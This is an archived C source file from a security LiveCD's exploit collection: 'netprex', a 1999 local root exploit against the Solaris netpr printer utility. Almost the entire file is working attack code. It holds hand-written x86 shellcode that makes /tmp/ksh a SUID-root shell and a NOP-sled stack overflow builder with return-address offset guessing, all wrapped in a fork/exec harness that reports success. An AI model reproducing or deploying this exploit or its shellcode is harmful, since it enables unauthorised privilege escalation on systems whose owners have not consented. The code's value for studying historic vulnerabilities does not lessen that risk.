home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / lpd / netprex-x86.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  7.3 KB  |  192 lines
  1. /**     
  2. ***  netprex - i386 Solaris root exploit for /usr/lib/lp/bin/netpr
  3. ***     
  4. ***  Tested and confirmed under Solaris 2.6 and 7 (i386)
  5. *** 
  6. ***  Usage:  % netprex hostname [offset]
  7. ***         
  8. ***  where hostname is the name of a host running the printer service on
  9. ***  TCP port 515 (such as "localhost" perhaps) and offset (if present)
  10. ***  is the number of bytes to add to the stack pointer to calculate your
  11. ***  target return address; try -1000 to 1000 in increments of 100 for
  12. ***  starters.
  13. ***        
  14. ***  Cheez Whiz / ADM   
  15. ***  cheezbeast@hotmail.com
  16. *** 
  17. ***  March 4, 1999
  18. **/ 
  19.     
  20. /*      Copyright (c) 1999 ADM  */
  21. /*        All Rights Reserved   */
  22.  
  23. /*      THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM      */
  24. /*      The copyright notice above does not evidence any        */
  25. /*      actual or intended publication of such source code.     */
  26.  
  27. #define BUFLEN 1047
  28. #define NOP 0x90
  29.  
  30. #include <stdio.h>
  31. #include <stdlib.h>
  32. #include <string.h>
  33. #include <sys/types.h>
  34. #include <sys/stat.h>
  35. #include <fcntl.h>
  36. #include <unistd.h>
  37. #include <sys/wait.h>
  38.  
  39. char shell[] =
  40. /*  0 */ "\xeb\x41"                              /* jmp springboard       */
  41. /* syscall:                                                               */
  42. /*  2 */ "\x9a\xff\xff\xff\xff\x07\xff"          /* lcall 0x7,0x0         */
  43. /*  9 */ "\xc3"                                  /* ret                   */
  44. /* start:                                                                 */
  45. /* 10 */ "\x5e"                                  /* popl %esi             */
  46. /* 11 */ "\x31\xc0"                              /* xor %eax,%eax         */
  47. /* 13 */ "\x89\x46\xbb"                          /* movl %eax,-0x45(%esi) */
  48. /* 16 */ "\x88\x46\xc0"                          /* movb %al,-0x40(%esi)  */
  49. /* 19 */ "\x88\x46\x08"                          /* movb %al,0x8(%esi)    */
  50. /* chown:                                                                 */
  51. /* 22 */ "\x31\xc0"                              /* xor %eax,%eax         */
  52. /* 24 */ "\x50"                                  /* pushl %eax            */
  53. /* 25 */ "\x50"                                  /* pushl %eax            */
  54. /* 26 */ "\x56"                                  /* pushl %esi            */
  55. /* 27 */ "\xb0\x10"                              /* movb $0x10,%al        */
  56. /* 29 */ "\xe8\xe0\xff\xff\xff"                  /* call syscall          */
  57. /* 34 */ "\x83\xc4\x0c"                          /* addl $0xc,%esp        */
  58. /* chmod:                                                                 */
  59. /* 37 */ "\x31\xc0"                              /* xor %eax,%eax         */
  60. /* 39 */ "\xb0\x6d"                              /* movb $0x6d,%al        */
  61. /* 41 */ "\xb4\x09"                              /* movb $0x9,%ah         */
  62. /* 43 */ "\x50"                                  /* pushl %eax            */
  63. /* 44 */ "\x56"                                  /* pushl %esi            */
  64. /* 45 */ "\x31\xc0"                              /* xor %eax,%eax         */
  65. /* 47 */ "\xb0\x0f"                              /* movb $0xf,%al         */
  66. /* 49 */ "\xe8\xcc\xff\xff\xff"                  /* call syscall          */
  67. /* 54 */ "\x83\xc4\x08"                          /* addl $0x8,%esp        */
  68. /* exit:                                                                  */
  69. /* 57 */ "\x31\xc0"                              /* xor %eax,%eax         */
  70. /* 59 */ "\x50"                                  /* pushl %eax            */
  71. /* 60 */ "\xb0\x01"                              /* movb $0x1,%al         */
  72. /* 62 */ "\xe8\xbf\xff\xff\xff"                  /* call syscall          */
  73. /* springboard:                                                           */
  74. /* 67 */ "\xe8\xc2\xff\xff\xff"                  /* call start            */
  75. /* data:                                                                  */
  76. /* 72 */ "\x2f\x74\x6d\x70\x2f\x6b\x73\x68\xff"; /* DATA                  */
  77.  
  78. char buf[BUFLEN+1];
  79.  
  80. unsigned long int
  81. get_esp()
  82. {
  83.     __asm__("movl %esp,%eax");                   
  84. }
  85.  
  86. int
  87. main(int argc, char *argv[])
  88. {
  89.     unsigned long int esp, nop;                                           
  90.     long int offset = 0;                         
  91.     char *hostname, c;                           
  92.     int i, null, umbilical[2];                   
  93.     struct stat st;
  94.     int status;                                                           
  95.  
  96.     if (argc < 2) {                                                       
  97.         printf("usage: %s hostname [offset]\n", argv[0]);                 
  98.         exit(1);
  99.     }
  100.  
  101.     esp = get_esp();
  102.     hostname = argv[1];
  103.     if (argc > 2)
  104.         offset = strtol(argv[2], NULL, 0);       
  105.     if (argc > 3)
  106.         nop = strtoul(argv[3], NULL, 0);
  107.     else
  108.         nop = 942;
  109.  
  110.     memset(buf, NOP, BUFLEN);                                             
  111.     memcpy(buf+nop, shell, strlen(shell));       
  112.     for (i = nop+strlen(shell); i <= BUFLEN-4; i += 4)
  113.         *((int *) &buf[i]) = esp+offset;         
  114.     
  115.     printf("using return address 0x%08x (0x%08x offset %d) [nop %d]\n",   
  116.            esp+offset, esp, offset, nop);
  117.     
  118.     if (stat("/tmp/ksh", &st) < 0) {
  119.         printf("exploit failed; copy /bin/ksh to /tmp first!\n");
  120.         exit(1);
  121.     }
  122.     
  123.     if (pipe(umbilical) < 0) {
  124.         printf("exploit failed; unable to create a pipe!\n");
  125.         exit(1); 
  126.     }
  127.         
  128.     switch (fork()) {
  129.     case -1:
  130.         printf("exploit failed; unable to fork!\n");
  131.         exit(1);
  132.         break;
  133.     case 0:
  134.         if ((null = open("/dev/null", O_RDWR, 0)) < 0) {
  135.             printf("exploit failed; cannot open /dev/null!\n");
  136.             exit(1);
  137.         }  
  138.         dup2(null, STDIN_FILENO);
  139.         dup2(null, STDOUT_FILENO);  
  140.         dup2(null, STDERR_FILENO);
  141.         if (null > STDERR_FILENO)
  142.             close(null);
  143.         close(umbilical[0]);
  144.         dup2(umbilical[1], 10); /* yes, descriptor 10 -- trust me ;-) */
  145.         execl("/usr/lib/lp/bin/netpr", 
  146.               "netpr",
  147.               "-I", "ADM-ADM",
  148.               "-U", "ADM!ADM",
  149.               "-p", buf,
  150.               "-d", hostname,
  151.               "-P", "bsd",
  152.               "/etc/passwd", NULL);
  153.         printf("exploit failed; unable to exec!\n");
  154.         exit(1);
  155.         break;
  156.     default:
  157.         close(umbilical[1]);
  158.         c = 0;
  159.         while (c != '\n') {
  160.             read(umbilical[0], &c, 1);
  161.         }
  162.         c = '\0';
  163.         while (write(umbilical[0], &c, 1) < 1)
  164.             ;
  165.         wait(&status);
  166.         if (WIFSIGNALED(status)) {
  167.             printf("exploit failed; child process died on signal %d "
  168.                    "(try adjusting the offset)\n", WTERMSIG(status));
  169.             exit(1);
  170.         } else if (WIFEXITED(status) && (WEXITSTATUS(status) != 0)) {
  171.             printf("exploit failed; child process exited with unexpected "
  172.                    "return value %d, instead of 0\n", WEXITSTATUS(status));
  173.             exit(1);
  174.         }
  175.         break;  
  176.     }   
  177.     
  178.     if (stat("/tmp/ksh", &st) < 0) {
  179.         printf("exploit failed; /tmp/ksh disappeared somehow!\n");
  180.         exit(1); 
  181.     } else if (st.st_uid != 0) {
  182.         printf("exploit failed; failed to make /tmp/ksh owned by root!\n");
  183.         exit(1); 
  184.     } else if ((st.st_mode & 07777) != 04555) {
  185.         printf("exploit failed; failed to change /tmp/ksh to mode 4555!\n");
  186.         exit(1);
  187.     } else {
  188.         printf("exploit successful; /tmp/ksh is now SUID root, dewd!\n");
  189.         exit(0);   
  190.     }       
  191. }       
  192.